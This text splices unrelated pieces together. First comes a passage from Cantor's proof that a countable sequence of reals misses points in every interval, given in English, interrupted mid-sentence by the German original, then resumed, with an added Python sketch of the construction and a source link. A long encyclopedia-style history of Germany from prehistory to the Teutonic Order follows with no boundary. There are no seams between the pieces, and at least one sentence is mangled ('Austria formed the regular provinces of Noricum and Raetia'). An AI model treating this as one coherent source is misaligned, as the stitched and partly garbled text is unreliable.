proved with full rigor in Borchardt's Journal, Vol. 77, page 260; namely, the following theorem: "If one has a simply [countably] infinite sequence ω1, ω2, ..., ων, ... of real, unequal numbers that proceed according to some rule, then in every given interval [α, β] a number η (and thus infinitely many of them) can be specified that does not occur in this sequence (as a member of it)."
In view of the great interest in this theorem, not only in the present discussion, but also in many other arithmetical as well as analytical relations, it might not be superfluous if we develop the argument followed there [Cantor's 1874 proof] more clearly here by using simplifying modifications.
Starting with the sequence ω1, ω2, ..., ων, ... (which we give [denote by] the symbol (ω)) and an arbitrary interval [α, β], where α < β, we will now demonstrate that in this interval a real number η can be found that does not occur in (ω).
I. We first notice that if our set (ω) is not everywhere dense in the interval [α, β], then within this interval another interval [γ, δ] must be present, all of whose numbers do not belong to (ω). From the interval [γ, δ], one can then choose any number for η. It lies in the interval [α, β] and definitely does not occur in our sequence (ω). Thus, this case presents no special considerations and we can move on to the more difficult case.
II. Let the set (ω) be everywhere dense in the interval [α, β]. In this case, every interval [γ, δ] located in [α, β], however small, contains numbers of our sequence (ω). To show that, nevertheless, numbers η in the interval [α, β] exist that do not occur in (ω), we employ the following observation.
Since some numbers in our sequence ω1, ω2, ..., ων, ...
[Seite 5]. . . Dem widerspricht aber ein sehr allgemeiner Satz, welchen wir in Borchardt's Journal, Bd. 77, pag. 260, mit aller Strenge bewiesen haben, nämlich der folgende Satz:
"Hat man eine einfach unendliche Reiheω1, ω2, . . . , ων, . . .von reellen, ungleichen Zahlen, die nach irgend einem Gesetz fortschreiten, so lässt sich in jedem vorgegebenen, Intervalle (α . . . β) eine Zahl η (und folglich lassen sich deren unendlich viele) angeben, welche nicht in jener Reihe (als Glied derselben) vorkommt."
In Anbetracht des grossen Interesses, welches sich an diesen Satz, nicht blos bei der gegenwärtigen Erörterung, sondern auch in vielen anderen sowohl arithmetischen, wie analytischen Beziehungen, knüpft, dürfte es nicht überflüssig sein, wenn wir die dort befolgte Beweisführung [Cantors 1874 Beweis], unter Anwendung vereinfachender Modificationen, hier deutlicher entwickeln.
Unter Zugrundelegung der Reihe:ω1, ω2, . . . , ων, . . .(welcher wir das Zeichen (ω) beilegen) und eines beliebigen Intervalles (α . . . β), wo α < β ist, soll also nun gezeigt werden, dass in diesem Intervalle eine reelle Zahl η gefunden werden kann, welche in (ω)nichtvorkommt.
I. Wir bemerken zunächst, dass wenn unsre Mannichfaltigkeit (ω) in dem Intervall (α . . . β)nicht überall-dichtist, innerhalb dieses Intervalles ein anderes (γ . . . δ) vorhanden sein muss, dessen Zahlen sämmtlich nicht zu (ω) gehören; man kann alsdann für η irgend eine Zahl des Intervalls (γ . . . δ) wählen, sie liegt im Intervalle (α . . . β) und kommt sicher in unsrer Reihe (ω)nichtvor. Dieser Fall bietet daher keinerlei besondere Umstände; und wir können zu demschwierigerenübergehen.
II. Die Mannichfaltigkeit (ω) sei im Intervalle (α . . . β)überall-dicht. In diesem Falle enthält jedes, noch so kleine in (α . . . β) gelegene Intervall (γ . . . δ) Zahlen unserer Reihe (ω). Um zu zeigen, dassnichtsdestowenigerZahlen η im Intervalle (α . . . β) existiren, welche in (ω) nicht vorkommen, stellen wir die folgende Betrachtung an.
Da in unserer Reihe:ω1, ω2, . . . , ων, . . .
definitely occur within the interval [α, β], one of these numbers must have the least index; let it be ωκ1, and let another, ωκ2, have the next larger index.
Let the smaller of the two numbers ωκ1, ωκ2 be denoted by α', the larger by β'. (Their equality is impossible because we assumed that our sequence consists of nothing but unequal numbers.)
Then, according to the definition: α < α' < β' < β; furthermore: κ1 < κ2; and all numbers ωμ of our sequence,
for which μ ≤ κ2, do not lie in the interior of the interval [α', β'], as is immediately clear from the definition of the numbers κ1, κ2. Similarly, let ωκ3 and ωκ4 be the two numbers of our sequence with smallest indices that fall in the interior of the interval [α', β'], and let the smaller of the numbers ωκ3, ωκ4 be denoted by α'', the larger by β''.
Then one has: α' < α'' < β'' < β', and κ2 < κ3 < κ4; and one sees that all numbers ωμ of our sequence, for which μ ≤ κ4, do not fall into the interior of the interval [α'', β''].
After one has followed this rule to reach an interval [α(ν−1), β(ν−1)], the next interval is produced by selecting the first two (i.e., with lowest indices) numbers of our sequence (ω) (let them be ωκ2ν−1 and ωκ2ν) that fall into the interior of [α(ν−1), β(ν−1)]. Let the smaller of these two numbers be denoted by α(ν), the larger by β(ν).
The interval [α^{(ν)}, β^{(ν)}] then lies in the interior of all preceding intervals and has the specific relation with our sequence (ω) that all numbers ω_μ for which μ ≤ κ_{2ν} definitely do not lie in its interior. Since obviously: κ_1 < κ_2 < κ_3 < . . . < κ_{2ν−2} < κ_{2ν−1} < κ_{2ν} < . . ., and these numbers, as indices, are whole numbers, we have: κ_{2ν} ≥ 2ν, and hence: ν < κ_{2ν}; thus we can certainly say (and this is sufficient for what follows): if ν is an arbitrary whole number, the [real] quantity ω_ν lies outside the interval [α^{(ν)}, β^{(ν)}].
Since the numbers α', α'', α''', . . ., α^{(ν)}, . . . are continually increasing in value while remaining enclosed in the interval [α, β], they have, by a well-known fundamental theorem of the theory of magnitudes [see note 2 below], a limit, which we denote by A, so that: A = Lim α^{(ν)} for ν = ∞.
The same applies to the numbers β', β'', β''', . . ., β^{(ν)}, . . ., which are continually decreasing and likewise lie in the interval [α, β]. We call their limit B, so that: B = Lim β^{(ν)} for ν = ∞.
Obviously, one has: α^{(ν)} < A ≤ B < β^{(ν)}.
But it is easy to see that the case A < B cannot occur here, since otherwise every number ω_ν of our sequence would lie outside of the interval [A, B], by lying outside the interval [α^{(ν)}, β^{(ν)}]; so our sequence (ω) would not be everywhere dense in the interval [α, β], contrary to the assumption.
Thus, there only remains the case A = B, and it is now demonstrated that the number: η = A = B does not occur in our sequence (ω).
If it were a member of our sequence, say the νth, then one would have: η = ω_ν.
But the latter equation is not possible for any value of ν, because η is in the interior of the interval [α^{(ν)}, β^{(ν)}], while ω_ν lies outside of it.
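Cantor's interval construction lends itself to direct computation. The sketch below is an illustration added here, not part of Cantor's text: it runs the construction in Python against the rationals in (0, 1), a concrete everywhere-dense sequence of distinct numbers; the function names and the choice of enumeration are our own. After ν rounds, any point in the interior of the current interval, such as its midpoint, differs from at least the first 2ν terms of the sequence, exactly as the argument above guarantees.

```python
from fractions import Fraction
from math import gcd

def rationals_in_unit_interval():
    """Enumerate the rationals in (0, 1) as a sequence of distinct
    numbers: 1/2, 1/3, 2/3, 1/4, 3/4, 1/5, 2/5, ...  This sequence is
    everywhere dense in (0, 1), as case II of the proof requires."""
    q = 2
    while True:
        for p in range(1, q):
            if gcd(p, q) == 1:          # skip duplicates such as 2/4
                yield Fraction(p, q)
        q += 1

def cantor_intervals(terms, alpha, beta, rounds):
    """Cantor's construction: in each round, scan the sequence in order
    for the first two terms strictly inside the current interval and
    shrink the interval to the one they bound.  `terms` is a finite list
    of leading terms of the sequence; raises if it is too short."""
    a, b = alpha, beta
    for _ in range(rounds):
        inside = []
        for omega in terms:
            if a < omega < b:
                inside.append(omega)
                if len(inside) == 2:
                    break
        if len(inside) < 2:
            raise ValueError("need more leading terms of the sequence")
        a, b = min(inside), max(inside)
    return a, b

if __name__ == "__main__":
    gen = rationals_in_unit_interval()
    terms = [next(gen) for _ in range(1000)]
    a, b = cantor_intervals(terms, Fraction(0), Fraction(1), 4)
    eta = (a + b) / 2   # lies in the interior of every interval built so far
    # By the argument above, eta differs from at least the first 8 terms.
    assert all(eta != t for t in terms[:8])
```

Exact rational arithmetic (`Fraction`) is used so that membership tests involve no floating-point error; with floats, terms equal to an interval endpoint could be misclassified as interior points.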
Note 2: Grössenlehre, which has been translated as "the theory of magnitudes", is a term used by 19th-century German mathematicians that refers to the theory of discrete and continuous magnitudes. (Ferreirós 2007, pp. 41–42, 202.)
https://en.wikipedia.org/wiki/Cantor%27s_first_uncountability_proof
The concept of Germany as a distinct region in Central Europe can be traced to Julius Caesar, who referred to the unconquered area east of the Rhine as Germania, thus distinguishing it from Gaul. The victory of the Germanic tribes in the Battle of the Teutoburg Forest (AD 9) prevented annexation by the Roman Empire, although the Roman provinces of Germania Superior and Germania Inferior were established along the Rhine. Following the Fall of the Western Roman Empire, the Franks conquered the other West Germanic tribes. When the Frankish Empire was divided among Charles the Great's heirs in 843, the eastern part became East Francia, and later the Kingdom of Germany. In 962, Otto I became the first Holy Roman Emperor of the Holy Roman Empire, the medieval German state.
During the High Middle Ages, the Hanseatic League, dominated by German port cities, established itself along the Baltic and North Seas. The growth of a crusading element within German Christendom led to the State of the Teutonic Order along the Baltic coast in what would later become Prussia. In the Investiture Controversy, the German emperors resisted Catholic Church authority. In the Late Middle Ages, the regional dukes, princes, and bishops gained power at the expense of the emperors. Martin Luther led the Protestant Reformation within the Catholic Church after 1517, as the northern and eastern states became Protestant while most of the southern and western states remained Catholic. The Thirty Years' War, a civil war from 1618 to 1648, brought tremendous destruction to the Holy Roman Empire. The estates of the empire attained great autonomy in the Peace of Westphalia, the most important being Austria, Prussia, Bavaria and Saxony. With the Napoleonic Wars, feudalism fell away and the Holy Roman Empire was dissolved in 1806. Napoleon established the Confederation of the Rhine as a German puppet state, but after the French defeat, the German Confederation was established under Austrian presidency. The German revolutions of 1848–1849 failed, but the Industrial Revolution modernized the German economy, leading to rapid urban growth and the emergence of the socialist movement. Prussia, with its capital Berlin, grew in power. German universities became world-class centers for science and the humanities, while music and art flourished. The unification of Germany was achieved under the leadership of the Chancellor Otto von Bismarck with the formation of the German Empire in 1871. The new Reichstag, an elected parliament, had only a limited role in the imperial government. Germany joined the other powers in colonial expansion in Africa and the Pacific.
By 1900, Germany was the dominant power on the European continent, and its rapidly expanding industry had surpassed Britain's while provoking it in a naval arms race. Germany led the Central Powers in World War I, but was defeated, partly occupied, forced to pay war reparations, and stripped of its colonies and significant territory along its borders. The German Revolution of 1918–1919 ended the German Empire with the abdication of Wilhelm II in 1918 and established the Weimar Republic, an ultimately unstable parliamentary democracy. In January 1933, Adolf Hitler, leader of the Nazi Party, used the economic hardships of the Great Depression along with popular resentment over the terms imposed on Germany at the end of World War I to establish a totalitarian regime. This Nazi Germany made racism, especially antisemitism, a central tenet of its policies, and became increasingly aggressive with its territorial demands, threatening war if they were not met. Germany quickly remilitarized, annexed its German-speaking neighbors and invaded Poland, triggering World War II. During the war, the Nazis established a systematic genocide program known as the Holocaust, which killed 11 million people, including 6 million Jews (two-thirds of the European Jewish population). By 1944, the German Army was pushed back on all fronts until finally collapsing in May 1945. Under occupation by the Allies, denazification efforts took place, large populations from former German-occupied territories were displaced, and German territories were split up by the victorious powers and in the east annexed by Poland and the Soviet Union. Germany spent the entirety of the Cold War era divided into the NATO-aligned West Germany and the Warsaw Pact-aligned East Germany. Germans also fled from Communist areas into West Germany, which experienced rapid economic expansion and became the dominant economy in Western Europe.
In 1989, the Berlin Wall was opened, the Eastern Bloc collapsed, and East and West Germany were reunited in 1990. The Franco-German friendship became the basis for the political integration of Western Europe in the European Union. In 1998–1999, Germany was one of the founding countries of the eurozone. Germany remains one of the economic powerhouses of Europe, contributing about a quarter of the eurozone's annual gross domestic product. In the early 2010s, Germany played a critical role in trying to resolve the escalating euro crisis, especially concerning Greece and other Southern European nations. In 2015, Germany faced the European migrant crisis as the main receiver of asylum seekers from Syria and other troubled regions. Germany opposed Russia's 2022 invasion of Ukraine and decided to strengthen its armed forces.
Pre-human apes such as Danuvius guggenmosi, present in Germany over 11 million years ago, are theorized to be among the earliest apes to walk on two legs, prior to other species and genera such as Australopithecus.[1] The discovery of the Homo heidelbergensis mandible in 1907 affirms archaic human presence in Germany by at least 600,000 years ago,[2] while stone tools have been dated as far back as 1.33 million years ago.[3] The oldest complete set of hunting weapons ever found anywhere in the world was excavated from a coal mine in Schöningen, Lower Saxony. Between 1994 and 1998, eight 380,000-year-old wooden javelins between 1.82 and 2.25 m (5.97 and 7.38 ft) in length were unearthed there.[4][5] One of the oldest buildings in the world and one of the oldest pieces of art was found in Bilzingsleben.[6]
In 1856, the fossilized bones of an extinct human species were salvaged from a limestone grotto in the Neander valley near Düsseldorf, North Rhine-Westphalia. The archaic nature of the fossils, now known to be around 40,000 years old, was recognized, and their characteristics were published in the first-ever paleoanthropologic species description, in 1858, by Hermann Schaaffhausen.[7] The species was named Homo neanderthalensis, Neanderthal man, in 1864.
The oldest traces of Homo sapiens in Germany were found in the Ilsenhöhle cave in Ranis, where up to 47,500-year-old remains were discovered, among the oldest in Europe.[8] The remains of Paleolithic early modern human occupation uncovered and documented in several caves in the Swabian Jura include various mammoth ivory sculptures that rank among the oldest uncontested works of art, and several flutes, made of bird bone and mammoth ivory, that are confirmed to be the oldest musical instruments ever found. The 41,000-year-old Löwenmensch figurine represents the oldest uncontested figurative work of art, and the 40,000-year-old Venus of Hohle Fels has been asserted as the oldest uncontested object of human figurative art ever discovered.[9][10][11][12] These artefacts are attributed to the Aurignacian culture.
Between 12,900 and 11,700 years ago, north-central Germany was part of the Ahrensburg culture (named for Ahrensburg).
The first groups of early farmers, distinct from the indigenous hunter-gatherers, migrated into Europe from a population in western Anatolia at the beginning of the Neolithic period, between 10,000 and 8,000 years ago.[13]
Central Germany was one of the primary areas of the Linear Pottery culture (c. 5500 BC – c. 4500 BC), which was partially contemporary with the Ertebølle culture (c. 5300 BC – c. 3950 BC) of Denmark and northern Germany. The construction of the Central European Neolithic circular enclosures falls in this time period, with the best known and oldest being the Goseck circle, constructed c. 4900 BC. Afterwards, Germany was part of the Rössen culture, Michelsberg culture and Funnelbeaker culture (c. 4600 BC – c. 2800 BC). The oldest traces of the use of wheel and wagon ever found are located at a northern German Funnelbeaker culture site and date to around 3400 BC.[14]
The settlers of the Corded Ware culture (c. 2900 BC – c. 2350 BC), which had spread over the fertile plains of Central Europe during the Late Neolithic, were of Indo-European ancestry. The Indo-Europeans had arrived, via mass migration, in the heartland of Europe around 4,500 years ago.[16]
By the late Bronze Age, the Urnfield culture (c. 1300 BC – c. 750 BC) had replaced the Bell Beaker, Unetice and Tumulus cultures in central Europe,[17] whilst the Nordic Bronze Age had developed in Scandinavia and northern Germany. The name comes from the custom of cremating the dead and placing their ashes in urns, which were then buried in fields. The first usage of the name occurred in publications about grave sites in southern Germany in the late 19th century.[18][19] Over much of Europe, the Urnfield culture followed the Tumulus culture and was succeeded by the Hallstatt culture.[20] The Italic peoples, including the Latins, from whom the Romans emerged, came from the Urnfield culture of central Europe.[21][22][23]
The Hallstatt culture, which had developed from the Urnfield culture, was the predominant Western and Central European culture from the 12th to 8th centuries BC and during the early Iron Age (8th to 6th centuries BC). It was followed by the La Tène culture (5th to 1st centuries BC).
The people who had adopted these cultural characteristics in central and southern Germany are regarded as Celts. How, and whether, the Celts are related to the Urnfield culture remains disputed. However, Celtic cultural centres developed in central Europe during the late Bronze Age (c. 1200 BC until 700 BC). Some, like the Heuneburg, the oldest city north of the Alps,[24] grew to become important cultural centres of the Iron Age in Central Europe that maintained trade routes to the Mediterranean. In the 5th century BC the Greek historian Herodotus mentioned a Celtic city at the Danube, Pyrene, that historians attribute to the Heuneburg. Beginning around 700 BC (or later), Germanic peoples (Germanic tribes) from southern Scandinavia and northern Germany expanded south and gradually replaced the Celtic peoples in Central Europe.[25][26][27][28][29][30]
The ethnogenesis of the Germanic tribes remains debated. However, for author Averil Cameron "it is obvious that a steady process" occurred during the Nordic Bronze Age, or at the latest during the Pre-Roman Iron Age[33] (Jastorf culture). From their homes in southern Scandinavia and northern Germany the tribes began expanding south, east and west during the 1st century BC,[34] and came into contact with the Celtic tribes of Gaul, as well as with Iranic,[35] Baltic,[36] and Slavic cultures in Central/Eastern Europe.[37]
Factual and detailed knowledge about the early history of the Germanic tribes is rare. Researchers have to be content with the recordings of the tribes' affairs with the Romans, linguistic conclusions, archaeological discoveries and the rather new yet promising results of archaeogenetic study.[38] In the mid-1st century BC, the Republican Roman statesman Julius Caesar erected the first known bridges across the Rhine during his campaign in Gaul and led a military contingent across into the territories of the local Germanic tribes. After several days, and having made no contact with Germanic troops (who had retreated inland), Caesar returned to the west of the river.[39] By 60 BC, the Suebi tribe under chieftain Ariovistus had conquered lands of the Gallic Aedui tribe to the west of the Rhine. Consequent plans to populate the region with Germanic settlers from the east were vehemently opposed by Caesar, who had already launched his ambitious campaign to subjugate all Gaul. Julius Caesar defeated the Suebi forces in 58 BC in the Battle of Vosges and forced Ariovistus to retreat across the Rhine.[40][41]
Augustus, the first Roman emperor, considered conquest beyond the Rhine and the Danube not only regular foreign policy but also necessary to counter Germanic incursions into a still rebellious Gaul. Forts and commercial centers were established along the rivers. Some tribes, such as the Ubii, consequently allied with Rome and readily adopted advanced Roman culture. During the 1st century CE Roman legions conducted extended campaigns into Germania magna, the area north of the Upper Danube and east of the Rhine, attempting to subdue the various tribes. Roman ideas of administration, the imposition of taxes and a legal framework were frustrated by the total absence of infrastructure. Germanicus's campaigns, for example, were almost exclusively characterized by frequent massacres of villagers and indiscriminate pillaging. The tribes, however, maintained their elusive identities. A coalition of tribes under the Cherusci chieftain Arminius, who was familiar with Roman tactical doctrines, defeated a large Roman force in the Battle of the Teutoburg Forest. Consequently, Rome resolved to permanently establish the Rhine/Danube border and refrain from further territorial advance into Germania.[42][43] By AD 100 the frontier along the Rhine and the Danube and the Limes Germanicus was firmly established. Several Germanic tribes lived under Roman rule south and west of the border, as described in Tacitus's Germania. Austria formed the regular provinces of Noricum and Raetia.[44][45][46] The provinces Germania Inferior (with the capital situated at Colonia Claudia Ara Agrippinensium, modern Cologne) and Germania Superior (with its capital at Mogontiacum, modern Mainz) were formally established in 85 AD, after long campaigns, as lasting military control was confined to the lands surrounding the rivers.[47] Christianity was introduced to Roman-controlled western Germania before the Middle Ages, with Christian religious structures such as the Aula Palatina of Trier built during the reign of Constantine I (r. 306–337).[48]
Rome's Third Century Crisis coincided with the emergence of a number of large West Germanic tribes: the Alamanni, Franks, Bavarii, Chatti, Saxons, Frisii, Sicambri, and Thuringii. By the 3rd century the Germanic-speaking peoples began to migrate beyond the limes and the Danube frontier.[49] Several large tribes – the Visigoths, Ostrogoths, Vandals, Burgundians, Lombards, Saxons and Franks – migrated and played their part in the decline of the Roman Empire and the transformation of the old Western Roman Empire.[50] By the end of the 4th century the Huns invaded eastern and central Europe, establishing the Hunnic Empire. The event triggered the Migration Period.[51] Hunnic hegemony over a vast territory in central and eastern Europe lasted until the death of Attila's son Dengizich in 469.[52] Another pivotal moment in the Migration Period was the Crossing of the Rhine in December 406 by a large group of tribes, including Vandals, Alans and Suebi, who settled permanently within the crumbling Western Roman Empire.[53]
Stem duchies (German: Stammesherzogtümer) in Germany refer to the traditional territories of the various Germanic tribes. The concept of such duchies survived especially in the areas which by the 9th century would constitute East Francia,[54] which included the Duchy of Bavaria, the Duchy of Swabia, the Duchy of Saxony, the Duchy of Franconia and the Duchy of Thuringia,[55] unlike, further west, the County of Burgundy or Lorraine in Middle Francia.[56][57]
The Salian emperors (reigned 1027–1125) retained the stem duchies as the major divisions of Germany, but they became increasingly obsolete during the early high-medieval period under the Hohenstaufen, and Frederick Barbarossa finally abolished them in 1180 in favour of more numerous territorial duchies.
Successive kings of Germany founded a series of border counties or marches in the east and the north. These included Lusatia, the North March (which would become Brandenburg and the heart of the future Prussia), and the Billung March. In the south, the marches included Carniola, Styria, and the March of Austria that would become Austria.
The Western Roman Empire fell in 476 with the deposition of Romulus Augustus by the Germanic foederati leader Odoacer, who became the first King of Italy.[58] Afterwards, the Franks, like other post-Roman Western Europeans, emerged as a tribal confederacy in the Middle Rhine-Weser region, within the territory soon to be called Austrasia (the "eastern land"), the northeastern portion of the future Kingdom of the Merovingian Franks. As a whole, Austrasia comprised parts of present-day France, Germany, Belgium, Luxembourg and the Netherlands. Unlike the Alamanni to their south in Swabia, they absorbed large swaths of former Roman territory as they spread west into Gaul, beginning in 250. Clovis I of the Merovingian dynasty conquered northern Gaul in 486 and, in the Battle of Tolbiac in 496, the Alemanni tribe in Swabia, which eventually became the Duchy of Swabia.
By 500, Clovis had united all the Frankish tribes, ruled all of Gaul[59] and was proclaimed King of the Franks between 509 and 511.[60] Clovis, unlike most Germanic rulers of the time, was baptized directly into Roman Catholicism instead of Arianism. His successors would cooperate closely with papal missionaries, among them Saint Boniface. After the death of Clovis in 511, his four sons partitioned his kingdom, including Austrasia. Authority over Austrasia passed back and forth from autonomy to royal subjugation, as successive Merovingian kings alternately united and subdivided the Frankish lands.[61]
During the 5th and 6th centuries the Merovingian kings conquered the Thuringii (531 to 532), the Kingdom of the Burgundians and the principality of Metz, and defeated the Danes, the Saxons and the Visigoths.[62] King Chlothar I (558 to 561) ruled the greater part of what is now Germany and undertook military expeditions into Saxony, while the south-east of what is modern Germany remained under the influence of the Ostrogoths. Saxons controlled the area from the northern sea board to the Harz Mountains and the Eichsfeld in the south.[63]
The Merovingians placed the various regions of their Frankish Empire under the control of semi-autonomous dukes, either Franks or local rulers,[64] and followed imperial Roman strategic traditions of social and political integration of the newly conquered territories.[65][66] While allowed to preserve their own legal systems,[67] the conquered Germanic tribes were pressured to abandon the Arian Christian faith.[68]
In 718 Charles Martel waged war against the Saxons in support of the Neustrians. In 743 his son Carloman, in his role as Mayor of the Palace, renewed the war against the Saxons, who had allied with and aided the duke Odilo of Bavaria.[69] The Catholic Franks, who by 750 controlled a vast territory in Gaul, north-western Germany, Swabia, Burgundy and western Switzerland that included the alpine passes, allied with the Curia in Rome against the Lombards, who posed a permanent threat to the Holy See.[59] Pressed by Liutprand, King of the Lombards, the Pope had already sent an envoy for help to the de facto ruler Charles Martel after his victory in 732 over the forces of the Umayyad Caliphate at the Battle of Tours; however, a lasting and mutually beneficial alliance would only materialize after Charles' death, under his successor as Duke of the Franks, Pepin the Short.[70]
In 751 Pippin III, Mayor of the Palace under the Merovingian king, himself assumed the title of king and was anointed by the Church. Pope Stephen II bestowed on him the hereditary title of Patricius Romanorum, protector of Rome and St. Peter,[71] in response to the Donation of Pepin, which guaranteed the sovereignty of the Papal States. Charles the Great (who ruled the Franks from 768 to 814) launched a decades-long military campaign against the Franks' heathen rivals, the Saxons and the Avars. The campaigns and insurrections of the Saxon Wars lasted from 772 to 804. The Franks eventually overwhelmed the Saxons and Avars, forcibly converted the people to Christianity, and annexed their lands to the Carolingian Empire.
After the death of the Frankish king Pepin the Short in 768, his oldest son Charlemagne ("Charles the Great") consolidated his power over and expanded the kingdom. Charlemagne ended 200 years of royal Lombard rule with the Siege of Pavia, and in 774 he installed himself as King of the Lombards. Loyal Frankish nobles replaced the old Lombard aristocracy following a rebellion in 776.[72] The next 30 years of his reign were spent ruthlessly strengthening his power in Francia and on the conquest of the Slavs and Pannonian Avars in the east and of tribes such as the Saxons and the Bavarians.[73][74] On Christmas Day, 800 AD, Charlemagne was crowned Imperator Romanorum (Emperor of the Romans) in Rome by Pope Leo III.[74]
Fighting among Charlemagne's three grandsons over the continuation of the custom of partible inheritance or the introduction of primogeniture caused the Carolingian empire to be partitioned into three parts by the Treaty of Verdun of 843.[75] Louis the German received the eastern portion of the kingdom, East Francia, all lands east of the Rhine river and to the north of Italy. This encompassed the territories of the German stem duchies (Franks, Saxons, Swabians, and Bavarians) that were united in a federation under the first non-Frankish king, Henry the Fowler, who ruled from 919 to 936.[76] The royal court moved permanently between a series of strongholds, called Kaiserpfalzen, that developed into economic and cultural centers. Aachen Palace played a central role, as the local Palatine Chapel served as the official site for all royal coronation ceremonies during the entire medieval period, until 1531.[74][77]
In 936, Otto I was crowned German king at Aachen, in 961 King of Italy in Pavia, and in 962 he was crowned emperor by Pope John XII in Rome. The tradition of the German king as protector of the Kingdom of Italy and the Latin Church resulted in the term Holy Roman Empire in the 12th century. The name, which came to be identified with Germany, continued to be used officially, with the extension Nationis Germanicæ (of the German Nation) added after the last imperial coronation in Rome in 1452, until its dissolution in 1806.[76] Otto strengthened the royal authority by re-asserting the old Carolingian rights over ecclesiastical appointments.[78] Otto wrested from the nobles the powers of appointment of the bishops and abbots, who controlled large land holdings. Additionally, Otto revived the old Carolingian program of appointing missionaries in the border lands. Otto continued to support celibacy for the higher clergy, so ecclesiastical appointments never became hereditary. By granting lands to the abbots and bishops he appointed, Otto actually turned these bishops into "princes of the Empire" (Reichsfürsten).[79] In this way, Otto was able to establish a national church. Outside threats to the kingdom were contained with the decisive defeat of the Hungarian Magyars at the Battle of Lechfeld in 955. The Slavs between the Elbe and the Oder rivers were also subjugated. Otto marched on Rome and drove John XII from the papal throne, and for years he controlled the election of the pope, setting a firm precedent for imperial control of the papacy for years to come.[80][81]
Otto I was followed on the throne by his son Otto II (955–983), emperor 973–983; Otto II's wife Theophanu (955–991), regent 983–991; Otto I's widow Adelaide of Italy (931–999), regent 991–995; and his grandson Otto III (980–1002), emperor 996–1002. Otto III died childless and was succeeded by his second cousin Henry II, who likewise died childless as the last emperor of the Ottonian dynasty.
Henry II was succeeded by Conrad II, a great-great-grandson of Otto I and the first emperor of the Salian dynasty. During the reign of Conrad II's son, Henry III (1039 to 1056), the empire supported the Cluniac reforms of the Church: the Peace of God, the prohibition of simony (the purchase of clerical offices), and required celibacy of priests. Imperial authority over the Pope reached its peak. However, Rome reacted with the creation of the College of Cardinals and Pope Gregory VII's series of clerical reforms. Pope Gregory insisted in his Dictatus Papae on absolute papal authority over appointments to ecclesiastical offices. The subsequent conflict, in which Emperor Henry IV was compelled to submit to the Pope at Canossa in 1077 after having been excommunicated, came to be known as the Investiture Controversy. In 1122, a temporary reconciliation was reached between Henry V and the Pope with the Concordat of Worms. With the conclusion of the dispute, the Roman church and the papacy regained supreme control over all religious affairs.[83][84] Consequently, the imperial Ottonian church system (Reichskirche) declined. It also ended the royal/imperial tradition of appointing selected powerful clerical leaders to counter the imperial secular princes.[85]
Between 1095 and 1291 the various campaigns of the crusades to the Holy Land took place. Knightly religious orders were established, including the Knights Templar, the Knights of St John (Knights Hospitaller), and the Teutonic Order.[86][87]
The term sacrum imperium (Holy Empire) was first used officially by Friedrich I in 1157,[88] but the words Sacrum Romanum Imperium, Holy Roman Empire, were only combined in July 1180 and would only appear consistently on official documents from 1254 onwards.[89]
The Hanseatic League was a commercial and defensive alliance of the merchant guilds of towns and cities in northern and central Europe that dominated marine trade in the Baltic Sea, the North Sea and along the connected navigable rivers during the Late Middle Ages (12th to 15th centuries). Each of the affiliated cities retained the legal system of its sovereign and, with the exception of the Free imperial cities, had only a limited degree of political autonomy.[90] Beginning with an agreement of the cities of Lübeck and Hamburg, guilds cooperated in order to strengthen and combine their economic assets, such as securing trading routes and tax privileges, to control prices and better protect and market their local commodities. Important centers of commerce within the empire, such as Cologne on the Rhine river and Bremen on the North Sea, joined the union, which resulted in greater diplomatic esteem.[91] The various regional princes, recognizing the league's great economic potential, granted favorable charters for often exclusive commercial operations.[92] During its zenith the alliance maintained trading posts and kontors in virtually all cities from London and Edinburgh in the west to Novgorod in the east and Bergen in Norway. By the late 14th century the powerful league enforced its interests with military means, if necessary. This culminated in a war with the sovereign Kingdom of Denmark from 1361 to 1370. Lübeck remained the principal city of the Hanseatic League; there, in 1356, the first general diet was held and the league's official structure was announced. The league declined after 1450 due to a number of factors, such as the 15th-century crisis, the territorial lords' shifting policies towards greater commercial control, the silver crisis and marginalization in the wider Eurasian trade network, among others.[93][94]
The Ostsiedlung (lit. eastern settlement) is the term for a process of largely uncoordinated immigration and chartering of settlement structures by ethnic Germans into territories already inhabited by Slavs and Balts east of the Saale and Elbe rivers, such as modern Poland and Silesia, and to the south into Bohemia, modern Hungary and Romania during the High Middle Ages from the 11th to the 14th century.[95][96] The primary purpose of the early imperial military campaigns into the lands to the east during the 10th and 11th century was to punish and subjugate the local heathen tribes. Conquered territories were mostly lost after the troops had retreated, but eventually were incorporated into the empire as marches, fortified borderlands with garrisoned troops in strongholds and castles, who were to ensure military control and enforce the exaction of tributes. Contemporary sources do not support the idea of policies or plans for the organized settlement of civilians.[97]
Emperor Lothair III re-established feudal sovereignty over Poland, Denmark and Bohemia from 1135 and appointed margraves to turn the borderlands into hereditary fiefs and install a civilian administration. There is no discernible chronology of the immigration process, as it took place in many individual efforts and stages, often even encouraged by the Slavic regional lords. However, the new communities were subjected to German law and customs. Total numbers of settlers were generally rather low and, depending on who held a numerical majority, populations usually assimilated into each other. In many regions only enclaves would persist, like Hermannstadt, founded by the Transylvanian Saxons in the medieval Hungarian Kingdom (today in Romania), whom Geza II had called on to repopulate the area as part of the Ostsiedlung; they arrived and founded the city in 1147 [Saxons called these parts of Transylvania "Altland" to distinguish them from later immigrant Saxon settlements established in about 1220 by the Teutonic Order].[98][99]
In 1230, the Catholic monastic order of the Teutonic Knights launched the Prussian Crusade. The campaign, which was supported by the forces of the Polish duke Konrad I of Masovia and initially intended to Christianize the Baltic Old Prussians, succeeded primarily in the conquest of large territories. The order, emboldened by imperial approval, quickly resolved to establish an independent state without the consent of duke Konrad. Recognizing only papal authority and based on a solid economy, the order steadily expanded the Teutonic state during the following 150 years, engaging in several land disputes with its neighbors. Permanent conflicts with the Kingdom of Poland, the Grand Duchy of Lithuania, and the Novgorod Republic eventually led to military defeat and containment by the mid-15th century. The last Grand Master, Albert of Brandenburg, converted to Lutheranism in 1525 and turned the remaining lands of the order into the secular Duchy of Prussia.[100][101]
